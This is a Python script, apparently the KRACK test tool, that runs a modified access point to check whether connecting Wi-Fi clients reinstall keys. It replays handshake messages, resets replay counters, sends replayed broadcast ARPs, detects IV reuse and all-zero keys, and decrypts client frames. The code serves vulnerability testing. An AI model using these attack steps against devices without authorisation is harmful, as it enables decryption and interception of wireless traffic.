123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663 |
- #!/usr/bin/env python3
- # Tests for key reinstallation vulnerabilities in Wi-Fi clients
- # Copyright (c) 2017-2021, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
- #
- # This code may be distributed under the terms of the BSD license.
- # See README for more details.
- import logging
- logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
- from scapy.all import *
- import libwifi
- from libwifi import *
- import sys, socket, struct, time, subprocess, atexit, select, os.path
- from wpaspy import Ctrl
- warned_hardware_decryption = False
- # Concrete TODOs:
- # 0. Option to send plaintext retransmissions of message 3 (this is now easy to do)
- # 1. More reliable group key high RSC installation test in the 4-way HS (see below)
- # 2. Test for unicast replay protection
- # 3. Retransmit the handshake messages?
- # 4. --group --gtkinit is a bit unreliable. Perhaps due to race condition between
- # install the group key and sending the broadcast ARP request?
- # 5. How are we sure the broadcast ARP indeed using a PN=1? We should monitor
- # this interface and throw an error if there is other traffic!
- # TODOs:
- # - Always mention 4-way handshake attack test (normal, tptk, tptk-rand)
- # - Stop testing a client even when we think it's patched?
- # - The --gtkinit with the 4-way handshake is very sensitive to packet loss
- # - Add an option to test replays of unicast traffic
- # - Also send replayed broadcast using a PN of 2 to avoid edge cases where
- # the client may always reject PNs of zero or 1.
- # Futute work:
- # - If the client installs an all-zero key, we cannot reliably test the group key handshake
- # - Automatically execute all relevant tests in order
- # - Force client to request a new IP address when connecting
- # - More reliable group key reinstall test: install very high RSC, then install a zero one.
- # This avoids constantly having to execute a new 4-way handshake for example.
- # After how many seconds a new message 3, or new group key message 1, is sent.
- HANDSHAKE_TRANSMIT_INTERVAL = 2
- #### Utility Commands ####
- def hostapd_clear_messages(hostapd_ctrl):
- # Clear old replies and messages from the hostapd control interface
- while hostapd_ctrl.pending():
- hostapd_ctrl.recv()
- def hostapd_command(hostapd_ctrl, cmd):
- hostapd_clear_messages(hostapd_ctrl)
- rval = hostapd_ctrl.request(cmd)
- if "UNKNOWN COMMAND" in rval:
- log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
- quit(1)
- elif "FAIL" in rval:
- log(ERROR, "Failed to execute command %s" % cmd)
- quit(1)
- return rval
- #### Main Testing Code ####
- class TestOptions():
- ReplayBroadcast, ReplayUnicast, Fourway, Grouphs = range(4)
- TptkNone, TptkReplay, TptkRand = range(3)
- def __init__(self, variant=Fourway):
- self.variant = variant
- # Additional options for Fourway tests
- self.tptk = TestOptions.TptkNone
- # Extra option for Fourway and Grouphs tests
- self.gtkinit = False
- class ClientState():
- UNKNOWN, VULNERABLE, PATCHED = range(3)
- IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
- def __init__(self, clientmac, options):
- self.mac = clientmac
- self.options = options
- self.TK = None
- self.vuln_4way = ClientState.UNKNOWN
- self.vuln_bcast = ClientState.UNKNOWN
- self.ivs = IvCollection()
- self.pairkey_sent_time_prev_iv = None
- self.pairkey_intervals_no_iv_reuse = 0
- self.broadcast_reset()
- def broadcast_reset(self):
- self.broadcast_state = ClientState.IDLE
- self.broadcast_prev_canary_time = 0
- self.broadcast_num_canaries_received = -1 # -1 because the first broadcast ARP requests are still valid
- self.broadcast_requests_sent = -1 # -1 because the first broadcast ARP requests are still valid
- self.broadcast_patched_intervals = 0
- def get_encryption_key(self, hostapd_ctrl):
- if self.TK is None:
- # Contact our modified Hostapd instance to request the pairwise key
- response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
- if not "FAIL" in response:
- self.TK = bytes.fromhex(response.strip())
- return self.TK
- def decrypt(self, p, hostapd_ctrl):
- payload = get_ccmp_payload(p)
- if payload.startswith(b"\xAA\xAA\x03\x00\x00\x00"):
- # On some kernels, the virtual interface associated to the real AP interface will return
- # frames where the payload is already decrypted (this happens when hardware decryption is
- # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
- plaintext = LLC(payload)
- else:
- key = self.get_encryption_key(hostapd_ctrl)
- plaintext = decrypt_ccmp(p, key)
- # If it still fails, try an all-zero key
- if plaintext == None:
- plaintext = decrypt_ccmp(p, b"\x00" * 16)
- # No need for the whole packet, just the plaintext payload
- if plaintext != None:
- plaintext = plaintext[LLC]
- return plaintext
- def track_used_iv(self, p):
- return self.ivs.track_used_iv(p)
- def is_iv_reused(self, p):
- return self.ivs.is_iv_reused(p)
- def check_pairwise_reinstall(self, p):
- """Inspect whether the IV is reused, or whether the client seem to be patched"""
- # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
- if self.ivs.is_iv_reused(p):
- if self.vuln_4way != ClientState.VULNERABLE:
- iv = dot11_get_iv(p)
- seq = dot11_get_seqnum(p)
- log(WARNING, ("%s: IV reuse detected (IV=%d, seq=%d). " +
- "Client reinstalls the pairwise key in the 4-way handshake (this is bad)") % (self.mac, iv, seq))
- self.vuln_4way = ClientState.VULNERABLE
- # If it's a higher IV than all previous ones, try to check if the client seems patched
- elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
- # Save how many intervals we received a data packet without IV reset. Use twice the
- # transmission interval of message 3, in case one message 3 is lost due to noise.
- if self.pairkey_sent_time_prev_iv is None:
- self.pairkey_sent_time_prev_iv = p.time
- elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
- self.pairkey_intervals_no_iv_reuse += 1
- self.pairkey_sent_time_prev_iv = p.time
- log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
- # If during several intervals all IV reset attempts failed, the client is likely patched.
- # We wait for enough such intervals to occur, to avoid getting a wrong result.
- if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
- self.vuln_4way = ClientState.PATCHED
- # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
- msg = "%s: client DOESN'T reinstall the pairwise key in the 4-way handshake (this is good)"
- if self.options.tptk == TestOptions.TptkNone:
- msg += " (used standard attack)"
- elif self.options.tptk == TestOptions.TptkReplay:
- msg += " (used TPTK attack)"
- elif self.options.tptk == TestOptions.TptkRand:
- msg += " (used TPTK-RAND attack)"
- log(INFO, (msg + ".") % self.mac, color="green")
- def mark_allzero_key(self, p):
- if self.vuln_4way != ClientState.VULNERABLE:
- iv = dot11_get_iv(p)
- seq = dot11_get_seqnum(p)
- log(WARNING, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
- "Client (re)installs an all-zero key in the 4-way handshake (this is very bad).") % (self.mac, iv, seq))
- log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this vulnerability first !!!" % self.mac, color="red")
- self.vuln_4way = ClientState.VULNERABLE
- def broadcast_print_patched(self):
- if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
- # TODO: Mention which variant of the 4-way handshake test was used
- hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
- if self.options.gtkinit:
- log(INFO, "%s: Client installs the group key in the %s handshake with the given replay counter (this is good)" % (self.mac, hstype), color="green")
- else:
- log(INFO, "%s: Client DOESN'T reinstall the group key in the %s handshake (this is good)" % (self.mac, hstype), color="green")
- if self.options.variant == TestOptions.ReplayBroadcast:
- log(INFO, "%s: Client DOESN'T accept replayed broadcast frames (this is good)" % self.mac, color="green")
- def broadcast_print_vulnerable(self):
- if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs]:
- hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
- if self.options.gtkinit:
- log(WARNING, "%s: Client always installs the group key in the %s handshake with a zero replay counter (this is bad)." % (self.mac, hstype))
- else:
- log(WARNING, "%s: Client reinstalls the group key in the %s handshake (this is bad)." % (self.mac, hstype))
- log(WARNING, " Or client accepts replayed broadcast frames (see --replay-broadcast).")
- if self.options.variant == TestOptions.ReplayBroadcast:
- log(WARNING, "%s: Client accepts replayed broadcast frames (this is bad)." % self.mac)
- log(WARNING, " Fix this before testing for group key (re)installations!")
- def broadcast_process_reply(self, p):
- """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
- # Must be testing this client, and must not be a benign retransmission
- if not self.broadcast_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
- if self.broadcast_prev_canary_time + 1 > p.time: return
- self.broadcast_num_canaries_received += 1
- log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.broadcast_num_canaries_received))
- # We wait for several replies before marking the client as vulnerable, because
- # the first few broadcast ARP requests still use a valid (not yet used) IV.
- if self.broadcast_num_canaries_received >= 5:
- assert self.vuln_bcast != ClientState.VULNERABLE
- self.vuln_bcast = ClientState.VULNERABLE
- self.broadcast_state = ClientState.FINISHED
- self.broadcast_print_vulnerable()
- # Remember that we got a reply this interval (see broadcast_check_replies to detect patched clients)
- else:
- self.broadcast_state = ClientState.GOT_CANARY
- self.broadcast_prev_canary_time = p.time
- def broadcast_check_replies(self):
- """Track when we send broadcast ARP requests, and determine if a client seems patched"""
- if self.broadcast_state == ClientState.IDLE:
- return
- if self.broadcast_requests_sent == 4:
- # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
- if self.broadcast_state == ClientState.GOT_CANARY:
- log(DEBUG, "%s: got a reply to broadcast ARPs during this interval" % self.mac)
- self.broadcast_state = ClientState.STARTED
- # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
- elif self.broadcast_state == ClientState.STARTED:
- self.broadcast_patched_intervals += 1
- log(DEBUG, "%s: didn't get reply received to broadcast ARPs during this interval" % self.mac)
- self.broadcast_state = ClientState.STARTED
- self.broadcast_requests_sent = 0
- # If the client appears secure for several intervals (see above), it's likely patched
- if self.broadcast_patched_intervals >= 5 and self.vuln_bcast == ClientState.UNKNOWN:
- self.vuln_bcast = ClientState.PATCHED
- self.broadcast_state = ClientState.FINISHED
- self.broadcast_print_patched()
- class KRAckAttackClient():
- def __init__(self):
- # Parse hostapd.conf
- self.script_path = os.path.dirname(os.path.realpath(__file__))
- try:
- interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
- except Exception as ex:
- log(ERROR, "Failed to parse the hostapd.conf config file")
- raise
- if not interface:
- log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
- quit(1)
- # Set other variables
- self.nic_iface = interface
- self.nic_mon = ("mon" + interface)[:15]
- self.options = None
- try:
- self.apmac = scapy.arch.get_if_hwaddr(interface)
- except:
- log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
- raise
- self.sock_mon = None
- self.sock_eth = None
- self.hostapd = None
- self.hostapd_ctrl = None
- self.dhcp = None
- self.broadcast_sender_ip = None
- self.broadcast_arp_sock = None
- self.clients = dict()
- def reset_client_info(self, clientmac):
- if clientmac in self.dhcp.leases:
- self.dhcp.remove_client(clientmac)
- log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
- if clientmac in self.clients:
- del self.clients[clientmac]
- log(DEBUG, "%s: Removing ClientState object" % clientmac)
- def handle_replay(self, p):
- """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
- function processes these frames manually so we can still test reinstallations of the group key."""
- if not dot11_is_encrypted_data(p): return
- # Reconstruct Ethernet header
- clientmac = p.addr2
- header = Ether(dst=self.apmac, src=clientmac)
- header.time = p.time
- # Decrypt the Wi-Fi frame
- client = self.clients[clientmac]
- plaintext = client.decrypt(p, self.hostapd_ctrl)
- if plaintext == None:
- return
- if not SNAP in plaintext:
- log(WARNING, "No SNAP layer in decrypted packet {}".format(plaintext))
- return None
- # Now process the packet as if it were a valid (non-replayed) one
- decap = header/plaintext[SNAP].payload
- self.process_eth_rx(decap)
- def check_hardware_encryption(self, p):
- global warned_hardware_decryption
- # Check for hardware decryption usage that prevents detection of IV reuse. The utility
- # function get_ccmp_payload was made so that it returns the payload after an extended IV.
- # Basically this script works if the plaintext starts at `get_ccmp_payload`, but if the
- # plaintext starts at other locations, it's unknown what the layout of the frame is. In
- # that case we should kill the script.
- payload = get_ccmp_payload(p)
- if dot11_is_encrypted_data(p) and payload != None and b"\xAA\xAA\x03\x00\x00\x00" in raw(p):
- if payload.startswith(b"\xAA\xAA\x03\x00\x00\x00"):
- if not warned_hardware_decryption:
- # - With the ath9k_htc it was not possible to detect the usage of an all-zero key
- # when using hardware decryption. It seems as if the hardware tries decryption,
- # thereby scrambling the contect of the frame, and then sees that decryption failed.
- # This means userspace doesn't receive the original frame, but a frame where the
- # (encrypted) data is scrambled.
- # - The ath9k_htc doesn't reset the (group) IV when installing a new key. this means
- # it will always think a device reinstalls the group key, because the ath9k_htc
- # will always use an incremented IV when though we reset the group key. We also
- # can't seem to detect this in userspace because the hardware may override the IV?
- log(WARNING, "Hardware decryption detected! Attemping to still detect IV reuse, but this is unreliable.")
- log(ERROR, "!!! Ideally you disable hardware decryption or use a different network card !!!")
- log(WARNING, "E.g., detecting all-zero key use may currently be unreliable, and with some network")
- log(WARNING, " cards key reinstallations cannot be detected at all currently...")
- warned_hardware_decryption = True
- else:
- # Whether an IV is included may depend on the direction of the packet. For instance,
- # with the "Intel Tiger Lake PCH CNVi WiFi" there's no IV included in transmitted frames,
- # but the IV *is* included in received frames.
- log(ERROR, "Hardware decryption seems to be dropping the IV, meaning we cannot detect key reinstallations.")
- log(ERROR, "Try to disable hardware decryption, use a different network card, or report this as a bug.")
- log(WARNING, "Frame causing the issue: {} with raw data being {}".format(repr(p), p))
- quit(1)
- def handle_mon_rx(self):
- p = self.sock_mon.recv()
- if p == None: return
- if p.type == 1: return
- # The first bit in FCfield is set if the frames is "to-DS"
- clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
- if apmac != self.apmac: return None
- # Reset info about disconnected clients
- if Dot11AssoReq in p or Dot11Deauth in p or Dot11Disas in p:
- self.reset_client_info(clientmac)
- # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
- elif p.addr1 == self.apmac and dot11_is_encrypted_data(p):
- self.check_hardware_encryption(p)
- if not clientmac in self.clients:
- self.clients[clientmac] = ClientState(clientmac, options=options)
- client = self.clients[clientmac]
- iv = dot11_get_iv(p)
- log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
- if decrypt_ccmp(p, b"\x00" * 16) != None:
- client.mark_allzero_key(p)
- if self.options.variant == TestOptions.Fourway and not self.options.gtkinit:
- client.check_pairwise_reinstall(p)
- if client.is_iv_reused(p):
- self.handle_replay(p)
- client.track_used_iv(p)
- def process_eth_rx(self, p):
- self.dhcp.reply(p)
- self.broadcast_arp_sock.reply(p)
- clientmac = p[Ether].src
- if not clientmac in self.clients: return
- client = self.clients[clientmac]
- if ARP in p and p[ARP].pdst == self.broadcast_sender_ip:
- client.broadcast_process_reply(p)
- def handle_eth_rx(self):
- p = self.sock_eth.recv()
- if p == None or not Ether in p: return
- self.process_eth_rx(p)
- def broadcast_send_request(self, client):
- clientip = self.dhcp.leases[client.mac]
- # Print a message when we start testing the client --- XXX this should be in the client?
- if client.broadcast_state == ClientState.IDLE:
- hstype = "group key" if self.options.variant == TestOptions.Grouphs else "4-way"
- log(STATUS, "%s: client has IP address -> now sending replayed broadcast ARP packets" % client.mac)
- client.broadcast_state = ClientState.STARTED
- # Send a new handshake message when testing the group key handshake
- if self.options.variant == TestOptions.Grouphs:
- cmd = "RESEND_GROUP_M1 " + client.mac
- cmd += "maxrsc" if self.options.gtkinit else ""
- hostapd_command(self.hostapd_ctrl, cmd)
- # Send a replayed broadcast ARP request to the client
- request = Ether(src=self.apmac, dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.broadcast_sender_ip, pdst=clientip)
- self.sock_eth.send(request)
- client.broadcast_requests_sent += 1
- log(INFO, "%s: sending broadcast ARP to %s from %s (sent %d ARPs this interval)" % (client.mac,
- clientip, self.broadcast_sender_ip, client.broadcast_requests_sent))
- def experimental_test_igtk_installation(self):
- """To test if the IGTK is installed using the given replay counter"""
- # 1. Set ieee80211w=2 in hostapd.conf
- # 2. Run this script using --gtkinit so a new group key is generated before calling this function
- # 3. Install the new IGTK using a very high given replay counter
- hostapd_command(self.hostapd_ctrl, "RESEND_GROUP_M1 %s maxrsc" % client.mac)
- time.sleep(1)
- # 4. Now kill the AP
- quit(1)
- # 5. Hostapd sends a broadcast deauth message. At least iOS will reply using its own
- # deauthentication respose if this frame is accepted. Sometimes hostapd doesn't
- # send a broadcast deauthentication. Is this when the client is sleeping?
- def configure_interfaces(self):
- log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
- # 0. Some users may forget this otherwise
- subprocess.check_output(["rfkill", "unblock", "wifi"])
- # 1. Remove unused virtual interfaces to start from a clean state
- subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
- # 2. Configure monitor mode on interfaces
- subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
- # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
- # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
- subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
- time.sleep(0.5)
- subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
- subprocess.check_output(["ifconfig", self.nic_mon, "up"])
- def run(self, options):
- self.options = options
- self.configure_interfaces()
- # Open the patched hostapd instance that carries out tests and let it start
- log(STATUS, "Starting hostapd ...")
- try:
- self.hostapd = subprocess.Popen([
- os.path.join(self.script_path, "../hostapd/hostapd"),
- os.path.join(self.script_path, "hostapd.conf")]
- + sys.argv[1:])
- except:
- if not os.path.exists("../hostapd/hostapd"):
- log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
- raise
- time.sleep(1)
- try:
- self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
- self.hostapd_ctrl.attach()
- except:
- log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
- log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
- raise
- self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
- self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
- # Let scapy handle DHCP requests
- self.dhcp = DHCP_sock(sock=self.sock_eth,
- domain='krackattack.com',
- pool=Net('192.168.100.0/24'),
- network='192.168.100.0/24',
- gw='192.168.100.254',
- renewal_time=600, lease_time=3600)
- # Configure gateway IP: reply to ARP and ping requests
- subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
- # Use a dedicated IP address for our broadcast ARP requests and replies
- self.broadcast_sender_ip = self.dhcp.pool.pop()
- self.broadcast_arp_sock = ARP_sock(sock=self.sock_eth, IP_addr=self.broadcast_sender_ip, ARP_addr=self.apmac)
- log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
- # Monitor both the normal interface and virtual monitor interface of the AP
- self.next_arp = time.time() + 1
- while True:
- sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
- if self.sock_mon in sel[0]: self.handle_mon_rx()
- if self.sock_eth in sel[0]: self.handle_eth_rx()
- # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
- if time.time() > self.next_arp:
- # When testing if the replay counter of the group key is properly installed, always install
- # a new group key. Otherwise KRACK patches might interfere with this test.
- # Otherwise just reset the replay counter of the current group key.
- if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs] and self.options.gtkinit:
- hostapd_command(self.hostapd_ctrl, "RENEW_GTK")
- else:
- hostapd_command(self.hostapd_ctrl, "RESET_PN FF:FF:FF:FF:FF:FF")
- self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
- for client in self.clients.values():
- #self.experimental_test_igtk_installation()
- # 1. Test the 4-way handshake
- if self.options.variant == TestOptions.Fourway and self.options.gtkinit and client.vuln_bcast != ClientState.VULNERABLE:
- # Execute a new handshake to test stations that don't accept a retransmitted message 3
- hostapd_command(self.hostapd_ctrl, "RENEW_PTK " + client.mac)
- # TODO: wait untill 4-way handshake completed? And detect failures (it's sensitive to frame losses)?
- elif self.options.variant == TestOptions.Fourway and not self.options.gtkinit and client.vuln_4way != ClientState.VULNERABLE:
- # First inject a message 1 if requested using the TPTK option
- if self.options.tptk == TestOptions.TptkReplay:
- hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac)
- elif self.options.tptk == TestOptions.TptkRand:
- hostapd_command(self.hostapd_ctrl, "RESEND_M1 " + client.mac + " change-anonce")
- # Note that we rely on an encrypted message 4 as reply to detect pairwise key reinstallations reinstallations.
- hostapd_command(self.hostapd_ctrl, "RESEND_M3 " + client.mac + (" maxrsc" if self.options.gtkinit else ""))
- # 2. Test if broadcast ARP request are accepted by the client. Keep injecting even
- # to PATCHED clients (just to be sure they keep rejecting replayed frames).
- if self.options.variant in [TestOptions.Fourway, TestOptions.Grouphs, TestOptions.ReplayBroadcast]:
- # 2a. Check if we got replies to previous requests (and determine if vulnerable)
- client.broadcast_check_replies()
- # 2b. Send new broadcast ARP requests (and handshake messages if needed)
- if client.vuln_bcast != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
- time.sleep(1)
- self.broadcast_send_request(client)
- def stop(self):
- log(STATUS, "Closing hostapd and cleaning up ...")
- if self.hostapd:
- self.hostapd.terminate()
- self.hostapd.wait()
- if self.sock_mon: self.sock_mon.close()
- if self.sock_eth: self.sock_eth.close()
- def cleanup():
- attack.stop()
- def argv_get_interface():
- for i in range(len(sys.argv)):
- if not sys.argv[i].startswith("-i"):
- continue
- if len(sys.argv[i]) > 2:
- return sys.argv[i][2:]
- else:
- return sys.argv[i + 1]
- return None
- def argv_pop_argument(argument):
- if not argument in sys.argv: return False
- idx = sys.argv.index(argument)
- del sys.argv[idx]
- return True
- def hostapd_read_config(config):
- # Read the config, get the interface name, and verify some settings.
- interface = None
- with open(config) as fp:
- for line in fp.readlines():
- line = line.strip()
- if line.startswith("interface="):
- interface = line.split('=')[1]
- elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
- if "TKIP" in line:
- log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
- log(ERROR, " >%s<" % line, showtime=False)
- quit(1)
- # Parameter -i overrides interface in config.
- # FIXME: Display warning when multiple interfaces are used.
- if argv_get_interface() is not None:
- interface = argv_get_interface()
- return interface
- def get_expected_scapy_ver():
- for line in open("requirements.txt"):
- if line.startswith("scapy=="):
- return line[7:].strip()
- return None
- if __name__ == "__main__":
- if "--help" in sys.argv or "-h" in sys.argv:
- print("\nSee README.md for usage instructions. Accepted parameters are")
- print("\n\t" + "\n\t".join(["--replay-broadcast", "--group", "--tptk", "--tptk-rand", "--gtkinit", "--debug"]) + "\n")
- quit(1)
- # Check if we're using the expected scapy version
- expected_ver = get_expected_scapy_ver()
- if expected_ver!= None and scapy.VERSION != expected_ver:
- log(WARNING, "You are using scapy version {} instead of the expected {}".format(scapy.VERSION, expected_ver))
- log(WARNING, "Are you executing the script from inside the correct python virtual environment?")
- options = TestOptions()
- # Parse the type of test variant to execute
- replay_broadcast = argv_pop_argument("--replay-broadcast")
- replay_unicast = argv_pop_argument("--replay-unicast")
- groupkey = argv_pop_argument("--group")
- fourway = argv_pop_argument("--fourway")
- if replay_broadcast + replay_unicast + fourway + groupkey > 1:
- print("You can only select one argument of out replay-broadcast, replay-unicast, fourway, and group")
- quit(1)
- if replay_broadcast:
- options.variant = TestOptions.ReplayBroadcast
- elif replay_unicast:
- options.variant = TestOptions.ReplayUnicast
- elif groupkey:
- options.variant = TestOptions.Grouphs
- else:
- options.variant = TestOptions.Fourway
- # Parse options for the 4-way handshake
- tptk = argv_pop_argument("--tptk")
- tptk_rand = argv_pop_argument("--tptk-rand")
- if tptk + tptk_rand > 1:
- print("You can only select one argument of out tptk and tptk-rand")
- quit(1)
- if tptk:
- options.tptk = TestOptions.TptkReplay
- elif tptk_rand:
- options.tptk = TestOptions.TptkRand
- else:
- options.tptk = TestOptions.TptkNone
- # Parse remaining options
- options.gtkinit = argv_pop_argument("--gtkinit")
- while argv_pop_argument("--debug"):
- change_log_level(-1)
- # Now start the tests
- attack = KRAckAttackClient()
- atexit.register(cleanup)
- attack.run(options=options)
|